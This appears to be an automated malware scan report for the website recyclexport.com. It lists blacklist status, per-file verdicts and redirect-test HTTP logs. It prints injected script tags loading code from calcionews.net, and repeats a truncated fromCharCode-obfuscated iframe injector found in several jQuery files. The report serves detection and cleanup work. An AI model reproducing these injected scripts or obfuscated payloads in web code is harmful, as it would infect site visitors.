Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=recyclexport.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://recyclexport.com/ | 200 OK Content-Length: 8283 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://calcionews.net/7PW6uX9o.php?id=59739311" type="text/javascript"></script> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://recyclexport.com/./js/cufon/cufon-yui.js | 200 OK Content-Length: 18257 Content-Type: application/x-javascript | clean |
http://recyclexport.com/./js/cufon/mgopen_modata_400-mgopen_modata_700.font.js | 200 OK Content-Length: 44260 Content-Type: application/x-javascript | clean |
http://recyclexport.com/./js/cufon/cufon-load.js | 200 OK Content-Length: 466 Content-Type: application/x-javascript | clean |
http://recyclexport.com/./js/jquery.tipsy.js | 200 OK Content-Length: 19770 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) nsjv="fr"+"omCh"+"ar"+"Co"+"de";if(document.querySelector)xgt=4;gpamo=("36,7c,8b,84,79,8a,7f,85,84,36,87,86,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,87,86,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,87,86,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8d,8d,8d,44,82,77,86 Antivirus reports:
| ||
http://recyclexport.com/./js/ddsmoothmenu.js | 200 OK Content-Length: 19860 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) nsjv="fr"+"omCh"+"ar"+"Co"+"de";if(document.querySelector)xgt=4;gpamo=("36,7c,8b,84,79,8a,7f,85,84,36,87,86,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,87,86,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,87,86,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8d,8d,8d,44,82,77,86 Antivirus reports:
| ||
http://recyclexport.com/index.html | 200 OK Content-Length: 8283 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://calcionews.net/7PW6uX9o.php?id=59739311" type="text/javascript"></script> | ||
http://recyclexport.com/paper.php?cat=0 | 200 OK Content-Length: 11517 Content-Type: text/html | clean |
http://recyclexport.com/./js/jquery.firerift.js | 200 OK Content-Length: 80617 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) nsjv="fr"+"omCh"+"ar"+"Co"+"de";if(document.querySelector)xgt=4;gpamo=("36,7c,8b,84,79,8a,7f,85,84,36,87,86,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,87,86,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,87,86,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8d,8d,8d,44,82,77,86 Antivirus reports:
| ||
http://recyclexport.com/./js/jquery.watermarkinput.js | 200 OK Content-Length: 14768 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) nsjv="fr"+"omCh"+"ar"+"Co"+"de";if(document.querySelector)xgt=4;gpamo=("36,7c,8b,84,79,8a,7f,85,84,36,87,86,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,87,86,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,87,86,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8d,8d,8d,44,82,77,86 Antivirus reports:
| ||
http://recyclexport.com/./js/jquery.prettyphoto.js | 200 OK Content-Length: 36319 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) nsjv="fr"+"omCh"+"ar"+"Co"+"de";if(document.querySelector)xgt=4;gpamo=("36,7c,8b,84,79,8a,7f,85,84,36,87,86,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,87,86,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,87,86,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8d,8d,8d,44,82,77,86 Antivirus reports:
| ||
http://recyclexport.com/index.php | 200 OK Content-Length: 11219 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://calcionews.net/7PW6uX9o.php?id=59739312" type="text/javascript"></script> | ||
http://recyclexport.com/paper.php?cat=1 | 200 OK Content-Length: 11517 Content-Type: text/html | clean |
http://recyclexport.com/paper.php?cat=2 | 200 OK Content-Length: 11517 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: recyclexport.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 06 Oct 2014 18:12:28 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Set-Cookie: ci_1d78dd4cfad4a2eb=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%226f93359f6110ebb7cd83be4d714e27ad%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221412619148%22%3B%7D3b48b86d4a3ddd38e22911c1cb6b4b03; expires=Mon, 06-Oct-2014 20:12:28 GMT; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: recyclexport.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 06 Oct 2014 18:12:28 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Set-Cookie: ci_1d78dd4cfad4a2eb=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%226f93359f6110ebb7cd83be4d714e27ad%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221412619148%22%3B%7D3b48b86d4a3ddd38e22911c1cb6b4b03; expires=Mon, 06-Oct-2014 20:12:28 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: recyclexport.com
Referer: http://www.google.com/search?q=recyclexport.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: recyclexport.com
Referer: http://www.google.com/search?q=recyclexport.com
Result:
The result is similar to the first query. There are no suspicious redirects found.